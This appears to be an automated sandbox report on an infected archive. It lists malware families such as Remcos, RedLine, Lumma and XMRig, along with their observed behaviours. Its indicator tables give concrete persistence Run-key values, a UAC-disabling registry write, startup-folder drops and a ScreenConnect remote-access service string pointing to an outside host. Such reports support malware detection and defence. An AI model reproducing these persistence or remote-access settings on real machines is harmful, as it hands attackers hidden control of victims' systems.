Analysis Overview
SHA256
cf99eaaa334a9c8ffc2fe0e1068ffcc02dda1dd8b2b0eab2821182c5d2c1f51d
Threat Level: Known bad
The file 241127-xqsswsslej_pw_infected.zip was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateProcessExOtherParentProcess
44Caliber family
Umbral
Stealc family
SystemBC
Umbral family
Amadey family
Quasar payload
Gurcu family
Phorphiex family
Lumma family
Risepro family
xmrig
Amadey
Detect Xworm Payload
Xmrig family
Gurcu, WhiteSnake
Discord RAT
RedLine payload
Detect Umbral payload
Redline family
Exelastealer family
Remcos family
AsyncRat
Lumma Stealer, LummaC
Suspicious use of NtCreateUserProcessOtherParentProcess
TA505
Xworm
RMS
Remcos
Ta505 family
44Caliber
Stealc
Zharkbot family
Asyncrat family
Discordrat family
UAC bypass
Xworm family
Quasar family
Quasar RAT
ZharkBot
Systembc family
RisePro
Exela Stealer
RedLine
XMRig Miner payload
Phorphiex, Phorpiex
Rms family
Modifies visibility of hidden/system files in Explorer
Phorphiex payload
Detects ZharkBot payload
Grants admin privileges
Detected Nirsoft tools
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Async RAT payload
Stops running service(s)
Command and Scripting Interpreter: PowerShell
Sets service image path in registry
Creates new service(s)
Modifies Windows Firewall
Blocklisted process makes network request
Adds policy Run key to start application
Uses browser remote debugging
Downloads MZ/PE file
Drops file in Drivers directory
Drops startup file
Unsecured Credentials: Credentials In Files
Themida packer
Clipboard Data
Identifies Wine through registry keys
Indicator Removal: Clear Windows Event Logs
VMProtect packed file
Event Triggered Execution: Component Object Model Hijacking
Uses the VBS compiler for execution
Loads dropped DLL
Reads data files stored by FTP clients
Checks BIOS information in registry
Executes dropped EXE
Reads user/profile data of web browsers
Checks computer location settings
Credentials from Password Stores: Windows Credential Manager
Enumerates connected drives
Network Service Discovery
Legitimate hosting services abused for malware hosting/C2
Obfuscated Files or Information: Command Obfuscation
Adds Run key to start application
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Checks whether UAC is enabled
Indicator Removal: File Deletion
Looks up external IP address via web service
Power Settings
Drops file in System32 directory
AutoIT Executable
Suspicious use of SetThreadContext
Hide Artifacts: Hidden Files and Directories
UPX packed file
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates processes with tasklist
Boot or Logon Autostart Execution: Authentication Package
Drops file in Program Files directory
Launches sc.exe
Drops file in Windows directory
System Location Discovery: System Language Discovery
Event Triggered Execution: Installer Packages
Program crash
Event Triggered Execution: Netsh Helper DLL
Unsigned PE
System Network Connections Discovery
Permission Groups Discovery: Local Groups
Browser Information Discovery
System Network Configuration Discovery: Internet Connection Discovery
Detects Pyinstaller
Access Token Manipulation: Create Process with Token
System Network Configuration Discovery: Wi-Fi Discovery
Enumerates physical storage devices
Embeds OpenSSL
NSIS installer
System policy modification
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: GetForegroundWindowSpam
Kills process with taskkill
Runs net.exe
Runs .reg file with regedit
Checks processor information in registry
Script User-Agent
Suspicious use of UnmapMainImage
Modifies system certificate store
Suspicious behavior: MapViewOfSection
Checks SCSI registry key(s)
Scheduled Task/Job: Scheduled Task
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
GoLang User-Agent
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Collects information from the system
Gathers network information
Uses Task Scheduler COM API
Modifies registry key
Runs ping.exe
Gathers system information
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
Detects videocard installed
Modifies data under HKEY_USERS
Delays execution with timeout.exe
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-12-12 18:19
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-12 18:19
Reported
2024-12-12 18:40
Platform
win10v2004-20241007-en
Max time kernel
959s
Max time network
1200s
Command Line
Signatures
Amadey
Amadey family
AsyncRat
Asyncrat family
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects ZharkBot payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Exela Stealer
Exelastealer family
Lumma Stealer, LummaC
Lumma family
Modifies visibility of hidden/system files in Explorer
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | \??\c:\windows\resources\svchost.exe | N/A |
Phorphiex family
Phorphiex payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Phorphiex, Phorpiex
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
Remcos
Remcos family
RisePro
Risepro family
Stealc
Stealc family
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2180 created 3464 | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI41242\Blsvr.exe | C:\Windows\Explorer.EXE |
| PID 2180 created 3464 | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI41242\Blsvr.exe | C:\Windows\Explorer.EXE |
| PID 2180 created 3464 | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI41242\Blsvr.exe | C:\Windows\Explorer.EXE |
| PID 3964 created 3464 | N/A | C:\Users\Admin\AppData\Local\Temp\1657333799.exe | C:\Windows\Explorer.EXE |
| PID 3964 created 3464 | N/A | C:\Users\Admin\AppData\Local\Temp\1657333799.exe | C:\Windows\Explorer.EXE |
| PID 876 created 3464 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\Explorer.EXE |
| PID 876 created 3464 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\Explorer.EXE |
| PID 876 created 3464 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\Explorer.EXE |
| PID 1680 created 3464 | N/A | C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif | C:\Windows\Explorer.EXE |
SystemBC
Systembc family
TA505
Ta505 family
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xmrig family
Xworm
Xworm family
ZharkBot
Zharkbot family
xmrig
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Grants admin privileges
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Files\qth5kdee.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\Google\Chrome\updater.exe | N/A |
Adds policy Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Users\Admin\AppData\Local\Temp\Files\file.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\Files\file.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\ProgramData\tst\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" | C:\ProgramData\tst\remcos.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\ProgramData\Remcos\remcos.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Creates new service(s)
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (c13606fe9009f11d)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (c13606fe9009f11d)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=fnback9636.site&p=8041&s=dff84209-b7dc-448b-8fd8-d772cabe318e&k=BgIAAACkAABSU0ExAAgAAAEAAQA9jYIrttwwC%2fVG8pSgng7hOaOxKOcglvdFFtkWeOWtX8fqsZgIKfVrWuN3su1CgiFbvlCYAExDue6opAYsm4ZcU%2fXlAy9prKBw8dHgYIr5MKTVcZ179o9h8%2f%2bnJY4jOeDKVmcK57L%2fEAFTuKdJ4YjAwIneAffDLjer1Vf%2banxJ%2b%2fQG9GXKFTsCbQPC0DPoXGR4nhNlJsUIT37D9pxvtL82%2fbs5OFG6ebhQ2MBDFYY21oOxjFRMMIWi2Owda95WULvij7v9vchg4Zacetd90xJGtyFFMUL53dS%2fRJ%2bjUcnwVvLNyKx3HwIoiBSP6LM2Nm5EN5LWd0R%2b3hStk2Qltk%2bh&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAfYu9oc1am0yvHfxstgb83QAAAAACAAAAAAAQZgAAAAEAACAAAAAcl7QJx51WIWlm%2f97d68knOHLDmhc8YMk%2bWpKSiakhXgAAAAAOgAAAAAIAACAAAABQXA1RRCIL0SpawatzWi8kVVFrY5j8hGLctHYZFOSln6AEAACLQgNbihyXmbxTioM8KOy3WlcD1ubNH%2bKYLVkdjJpCsLwv1c09knFTKqPX%2bTKT66q%2fkv%2f4mCQq3e1BsOiaqZX6xcUzuAHT34p%2bvGM9Sm%2baiAoR1T84wW4OgKg949Kiq4gADYRGK%2fRa2QNt1%2fjD2UgM6CEoUoFsEnwkZkXXVXtRyNw3nOkXC%2fMclQ1sFX9JaOaD9twuD7lhh2kl4eV7HIj%2fXTVAnXNW1jLdwzJA9kNEVEk2m0pffdIxlgIkXt0Ew86Lq%2f%2bPzf71dMz6te1zFuVJOdFbpOomcgUxOnLGCZaCoyEJ5vn094pYBr7hyfj7zA9eRbiOhYJ%2bHaRXszadpR8ebDP7U3PZFBAr9RROyolueMMnWjL2O6B6%2fb9dqMTjdUYHYtfpBx0fL7AMLuLgAgPVPNA7R3XC3tAuVfHKxahgSmU21p%2bIVp4Wg5lnQFB32KJpLaiBODcfc14tR8ktV6jIt1sb9qlnHVWvq2k62%2frwrp98RKVCoISo9xAbRejo1Z99IcG7aDbXheLWYYWCTtPT0FhHopqowddl8O%2fBlo7E7%2fQJdGTKzmgf8bKhAtt3lL0ReY322bXHJ%2faZVoRe%2f718J9PUB61SO%2fsHS6KpHdmNyZHUA6GWSnKoRYrbZXpEYlexMhzNbp%2f1mLIDfAxgoSg4cOJVh2HXoKSk7c2W6gOoIsFmwv%2bMyX9AT6Zn0M7uYdMi4EemPzsUFSv3woU6Kzovjevy7c0aueREmdCmSIf64gSphEZGLt5gKfVG8nrGDUkW1T6H9VuLAEW%2fGiPWecfPqIFXDdt2TWwsJIw8XujiGu%2blUgitOBO5IwtX2Ygyd6G4q%2fP%2bdvvL4INiPuePVAlKEMsHdBL%2b8P8CQhIO6XZSSpNxydlv78svrwOQCUzXUKPTs2ZHhq%2bYdrVmhoBiX60zLEdxM%2fwoM9cDwn0a4Eelh6abY6EMyxPETEoMXITUZOmon8b8g0J5XwWTyiXeQdlZ%2fG6BnmtQPtLry0qL0tJ13ArQ7UCcYM3gkUgi6fvwQmR7xT9mhagjQANmSSLZAM%2f50laioMrkgXgG%2f994rDbTRey5%2bzAWhACVKAH6sneKqP1TY8SjvkM0Yr6DSpHXbfk7G3doZv3gmqD9Kp%2bl6cBhTdPoa0m5dGu8NWTiZM%2f53Dkl%2brf63PSqNIrYkPAchsi8U7Lm6hItPfjtf8Do0ErwYv8xjb7tYJ9RpoB9omjCG%2bKukWwF88A%2bWe8D2z3x%2bylvcon%2fcMkyoVdPWQPmxJwwu7Mjz2f1qBjV49dZf7qTX%2b9VnGIBmeIFsnSPhyAcDnmqLq1gjhweXDJrkZf8595GNlBm5FM6ph8En8j8oGVMSVKz5BWxmTvLEw3SMZXF1WfblcKcRySi1wEMwsESwPOihGPTGqTK7nlmH6U7NaZYDUNBZvrhceunf%2fqnI36nEM6U4%2fSSTUNswLSACpEiRDS0Y1j8ujBEGhCPvc1lr6%2f6i5ssUzEyuOoE9edLEPbzRP%2fNWc8kFnj%2fmcJ4A8PD%2b0rJ4v6d7vfI6vrL0ROC2sV5SuYPCYS1zdD1pwsxfzlP3ACcksEZhqzocuU%2bG3d4IRjKuUAAAADXZ2g92haPt%2fueSEcAxo%2fN8uUOko0EO9nRiEwmg%2fnDCULWNrQoIiZcn90AD2cGPdcBIuZzzp1QKfge3Z7LQx8h\"" | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.exe | N/A |
Stops running service(s)
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Google\Chrome\updater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Google\Chrome\updater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\qth5kdee.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\qth5kdee.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\ConsiderableWinners.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1599224382.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\223522870.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\ATLEQQXO.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\AsyncClient.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\file1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\Opdxdyeul.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\Pichon.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\Statement-110122025.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\armadegon.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\ChatLife.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\H8hsp6zrMtJI2hC.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\7cl16anh.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\Nework.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\file.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\8fc809.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\nothjgdwa.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\Rage.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe | N/A |
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\frameApp_consoleMode.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.exe | C:\Users\Admin\AppData\Local\Temp\Files\2020.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\frameApp_consoleMode.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.exe | C:\Users\Admin\AppData\Local\Temp\Files\2020.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mrsYC4kDbQNPAiJow2kT3TU0.bat | C:\Users\Admin\AppData\Local\Temp\Files\file1.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsecured Credentials: Credentials In Files
Uses the VBS compiler for execution
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" | C:\Users\Admin\AppData\Local\Temp\3188116601.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\Files\file.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\Files\file.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" | C:\ProgramData\tst\remcos.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Yjlwuuys = "C:\\Users\\Admin\\AppData\\Roaming\\Yjlwuuys.exe" | C:\Users\Admin\AppData\Local\Temp\Files\Opdxdyeul.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\sysnldcvmr.exe" | C:\Users\Admin\AppData\Local\Temp\2863614952.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\Files\leto.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Monster Update Service = "C:\\Users\\Admin\\AppData\\Local\\MonsterUpdateService\\Monster.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" | C:\ProgramData\tst\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" | \??\c:\windows\resources\svchost.exe | N/A |
